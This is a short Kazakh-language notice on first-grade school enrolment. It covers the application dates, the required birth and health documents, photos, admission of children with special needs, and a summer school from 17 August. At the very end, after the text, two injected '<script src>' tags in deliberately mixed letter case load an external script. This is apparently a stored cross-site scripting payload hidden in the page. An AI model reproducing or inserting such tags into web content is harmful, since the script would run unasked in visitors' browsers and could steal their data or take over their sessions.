1 сыныпқа құжаттар тізімі 1 маусымда басталып, 30 тамызға дейін жалғасады. egov.kz баланың туу туралы куәлігінің көшірмесі; 026/у-3 "баланың денсаулық паспорты" нысаны бойынша денсаулығы туралы құжат; 063/у нысаны бойынша денсаулық жағдайы туралы құжат; 3х4 екі фотосурет. Ерекше білім беру қажеттілігі бар балаларды білім беру ұйымдарына оқуға қабылдау баланың ата-анасының немесе өзге де заңды өкілдерінің келісімі бойынша педагогикалық-медициналық-психологиялық консультацияның қорытындысын ескере отырып жүзеге асырылады. 17 тамыздан бастап Жазғы мектеп жұмыс істей бастайды, онда ата-аналардың қалауы бойынша мектепке дейінгі мекемелерге бармаған немесе мектепалды даярлықтан өтпеген балалар жүре алады.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>